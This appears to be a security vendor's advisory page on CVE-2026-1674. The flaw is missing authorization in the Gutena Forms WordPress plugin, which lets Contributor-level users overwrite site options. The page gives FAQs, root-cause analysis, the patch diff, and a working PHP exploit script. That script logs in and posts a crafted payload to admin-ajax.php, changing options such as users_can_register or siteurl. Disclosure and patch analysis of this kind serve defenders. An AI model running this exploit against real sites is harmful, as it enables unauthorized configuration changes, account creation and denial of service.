What is CVE-2026-1674?

CVE-2026-1674 is a security vulnerability in the Gutena Forms plugin for WordPress, affecting versions up to and including 1.6.0. It allows authenticated users with Contributor-level access and above to modify WordPress options due to missing authorization in the save_gutena_forms_schema() function.

How does the vulnerability work?

The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint, using a crafted payload to overwrite WordPress option values. This can lead to unauthorized changes in site settings, such as enabling user registration or causing site errors.

Who is affected by this vulnerability?

Any WordPress site using the Gutena Forms plugin version 1.6.0 or earlier is vulnerable. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability to modify critical site options.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Gutena Forms plugin installed. If it is version 1.6.0 or earlier, your site is at risk. Additionally, review user roles to identify any users with Contributor-level access or higher.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Gutena Forms plugin to version 1.6.1 or later, where the issue has been patched. Regularly check for updates to all plugins to ensure security vulnerabilities are addressed promptly.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while exploitation requires authenticated access, the potential impact on the site could lead to significant issues, such as unauthorized changes to critical settings.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can allow attackers to change important WordPress settings, such as enabling user registration when it is disabled. This could lead to unauthorized user accounts being created or even denial of service due to site errors.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to the AJAX endpoint. It illustrates how an attacker can manipulate WordPress options, demonstrating the potential for unauthorized access and changes.

What is the role of the GUTENA_FORMS_SCHEMA_OPTION_PREFIX?

The GUTENA_FORMS_SCHEMA_OPTION_PREFIX is a security measure introduced in the patch for version 1.6.1. It prevents arbitrary option overwrites by ensuring that all form schema option names are prefixed, restricting access to options outside the plugin’s namespace.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Gutena Forms plugin or restricting access to users with Contributor-level permissions or higher until the plugin can be updated. Regularly review user roles to minimize exposure.

How can I stay informed about future vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories related to your installed plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1674: Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder <= 1.6.0 – Authenticated (Contributor+) Limited Options Update in save_gutena_forms_schema() (gutena-forms)

CVE ID CVE-2026-1674

Plugin gutena-forms

Severity Medium (CVSS 6.5)

CWE 862

Vulnerable Version 1.6.0

Patched Version 1.6.1

Disclosed March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1674:

The vulnerability originates from the save_gutena_forms_schema() function in the Gutena Forms WordPress plugin. This function allowed authenticated users with Contributor-level permissions or higher to update arbitrary WordPress options via the plugin’s form schema saving mechanism. The root cause was missing authorization and improper option name scoping. The function used update_option() with a user-controlled formID parameter without prefixing, enabling attackers to overwrite any site option.

Exploitation occurs through the WordPress AJAX endpoint at /wp-admin/admin-ajax.php. Attackers send a POST request with action=save_gutena_forms_schema and a crafted formSchema payload. The formSchema[‘form_attrs’][‘formID’] parameter specifies the target WordPress option name to overwrite. Attackers can set this to critical WordPress options like ‘users_can_register’ to enable user registration when disabled, or ‘siteurl’ to cause site errors and denial of service. The payload must be a structured array that passes the plugin’s sanitize_array() filter.

The patch introduces a security prefix GUTENA_FORMS_SCHEMA_OPTION_PREFIX defined as ‘gutena_forms_schema_’. This prefix is prepended to all form schema option names in update_option() calls. The patch also adds a helper function gutena_forms_get_form_schema_option() that handles backward compatibility while ensuring new writes use prefixed names. This scoping prevents arbitrary option overwrite because attackers cannot control options outside the plugin’s namespace.

Successful exploitation allows attackers with Contributor access to modify critical WordPress settings. This can enable disabled user registration, change site configuration, or set option values that cause site errors leading to denial of service. The vulnerability requires authenticated access but affects all users with publishing capabilities, making it a significant privilege escalation risk.

Differential between vulnerable and patched code

Code Diff

--- a/gutena-forms/gutena-forms.php
+++ b/gutena-forms/gutena-forms.php
@@ -4,7 +4,7 @@
  * Description:       Gutena Forms is the easiest way to create forms inside the WordPress block editor. Our plugin does not use jQuery and is lightweight, so you can rest assured that it won’t slow down your website. Instead, it allows you to quickly and easily create custom forms right inside the block editor.
  * Requires at least: 6.5
  * Requires PHP:      5.6
- * Version:           1.6.0
+ * Version:           1.6.1
  * Author:            Gutena Forms
  * Author URI:        https://gutenaforms.com
  * License:           GPL-2.0-or-later
@@ -42,7 +42,44 @@
  * Plugin version.
  */
 if ( ! defined( 'GUTENA_FORMS_VERSION' ) ) {
-	define( 'GUTENA_FORMS_VERSION', '1.5.1' );
+	define( 'GUTENA_FORMS_VERSION', '1.6.1' );
+}
+
+/**
+ * Option name prefix for form schema (security: prevents arbitrary option overwrite).
+ */
+if ( ! defined( 'GUTENA_FORMS_SCHEMA_OPTION_PREFIX' ) ) {
+	define( 'GUTENA_FORMS_SCHEMA_OPTION_PREFIX', 'gutena_forms_schema_' );
+}
+
+if ( ! function_exists( 'gutena_forms_get_form_schema_option' ) ) {
+	/**
+	 * Get form schema option value. Checks non-prefixed first, then prefixed; if both exist, returns prefixed.
+	 *
+	 * @param string $form_id Form ID (option key).
+	 * @param mixed  $default Default if neither option exists.
+	 * @return mixed Form schema array or $default.
+	 */
+	function gutena_forms_get_form_schema_option( $form_id, $default = false ) {
+		$form_id = sanitize_key( $form_id );
+		if ( '' === $form_id ) {
+			return $default;
+		}
+		$non_prefixed = get_option( $form_id, null );
+		$prefixed     = get_option( GUTENA_FORMS_SCHEMA_OPTION_PREFIX . $form_id, null );
+		$has_non_prefixed = ( null !== $non_prefixed );
+		$has_prefixed     = ( null !== $prefixed );
+		if ( $has_non_prefixed && $has_prefixed ) {
+			return $prefixed;
+		}
+		if ( $has_prefixed ) {
+			return $prefixed;
+		}
+		if ( $has_non_prefixed ) {
+			return $non_prefixed;
+		}
+		return $default;
+	}
 }

 if ( ! function_exists( 'gutena_forms__fs' ) ) :
@@ -463,9 +500,9 @@
 						}
 						//filter for formSchema
 						$formSchema_filtered = apply_filters( 'gutena_forms_save_form_schema', $formSchema, $formSchema['form_attrs']['formID'], $gutena_form_ids );
-						//Save form schema
+						//Save form schema (prefixed option name prevents arbitrary option overwrite)
 						update_option(
-							sanitize_key( $formSchema['form_attrs']['formID'] ),
+							GUTENA_FORMS_SCHEMA_OPTION_PREFIX . sanitize_key( $formSchema['form_attrs']['formID'] ),
 							$this->sanitize_array( $formSchema_filtered, true )
 						);

--- a/gutena-forms/includes/admin/class-create-store.php
+++ b/gutena-forms/includes/admin/class-create-store.php
@@ -59,7 +59,7 @@

                         //get form schema
                         $form_id = sanitize_key( $form_id );
-                        $form_schema = get_option( $form_id, false );
+                        $form_schema = gutena_forms_get_form_schema_option( $form_id, false );

                         if ( ! empty( $form_schema ) && ! empty( $form_schema['form_attrs'] ) ) {
                             $this->save_new_form( $form_id, $form_schema );
--- a/gutena-forms/includes/handlers/class-form-submit-handler.php
+++ b/gutena-forms/includes/handlers/class-form-submit-handler.php
@@ -269,7 +269,7 @@
 			}

 			$this->id     = sanitize_key( wp_unslash( $_POST['formid'] ) );
-			$this->schema = get_option( $this->id );
+			$this->schema = gutena_forms_get_form_schema_option( $this->id );

 			if ( empty( $this->schema ) || empty( $this->schema['form_attrs'] ) || empty( $this->schema['form_fields'] ) ) {
 				wp_send_json(

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1674 - Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder <= 1.6.0 - Authenticated (Contributor+) Limited Options Update in save_gutena_forms_schema()

<?php
// Configuration
$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// WordPress options to manipulate (choose one)
$target_option = 'users_can_register'; // Enable user registration
// $target_option = 'siteurl'; // Break site functionality
// $target_option = 'home'; // Cause redirect loops

// Login to get authentication cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded'
    ]
]);

$response = curl_exec($ch);

// Check login success by looking for dashboard redirect
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Craft malicious form schema payload
$payload = [
    'action' => 'save_gutena_forms_schema',
    'formSchema' => json_encode([
        'form_attrs' => [
            'formID' => $target_option, // User-controlled option name
            'formName' => 'Malicious Form'
        ],
        'form_fields' => [],
        'form_settings' => []
    ]),
    'gutena_form_ids' => '[]'
];

// Send exploit request
curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_POSTFIELDS => http_build_query($payload),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'X-Requested-With: XMLHttpRequest'
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Verify exploitation
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Exploit successful. Option '$target_option' has been modified.n";
    echo "Response: $responsen";
} else {
    echo "Exploit failed. HTTP Code: $http_coden";
    echo "Response: $responsen";
}

// Cleanup
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>

Frequently Asked Questions

What is CVE-2026-1674?
Overview of the vulnerability
CVE-2026-1674 is a security vulnerability in the Gutena Forms plugin for WordPress, affecting versions up to and including 1.6.0. It allows authenticated users with Contributor-level access and above to modify WordPress options due to missing authorization in the save_gutena_forms_schema() function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint, using a crafted payload to overwrite WordPress option values. This can lead to unauthorized changes in site settings, such as enabling user registration or causing site errors.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Gutena Forms plugin version 1.6.0 or earlier is vulnerable. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability to modify critical site options.
How can I check if my site is vulnerable?
Verification steps
To determine if your site is vulnerable, check the version of the Gutena Forms plugin installed. If it is version 1.6.0 or earlier, your site is at risk. Additionally, review user roles to identify any users with Contributor-level access or higher.
How can I fix this vulnerability?
Steps for remediation
To mitigate this vulnerability, update the Gutena Forms plugin to version 1.6.1 or later, where the issue has been patched. Regularly check for updates to all plugins to ensure security vulnerabilities are addressed promptly.
What does the CVSS score of 6.5 mean?
Understanding severity levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while exploitation requires authenticated access, the potential impact on the site could lead to significant issues, such as unauthorized changes to critical settings.
What are the practical risks of this vulnerability?
Potential consequences
Exploitation of this vulnerability can allow attackers to change important WordPress settings, such as enabling user registration when it is disabled. This could lead to unauthorized user accounts being created or even denial of service due to site errors.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to the AJAX endpoint. It illustrates how an attacker can manipulate WordPress options, demonstrating the potential for unauthorized access and changes.
What is the role of the GUTENA_FORMS_SCHEMA_OPTION_PREFIX?
Security improvements in the patch
The GUTENA_FORMS_SCHEMA_OPTION_PREFIX is a security measure introduced in the patch for version 1.6.1. It prevents arbitrary option overwrites by ensuring that all form schema option names are prefixed, restricting access to options outside the plugin’s namespace.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Gutena Forms plugin or restricting access to users with Contributor-level permissions or higher until the plugin can be updated. Regularly review user roles to minimize exposure.
How can I stay informed about future vulnerabilities?
Best practices for security awareness
To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories related to your installed plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations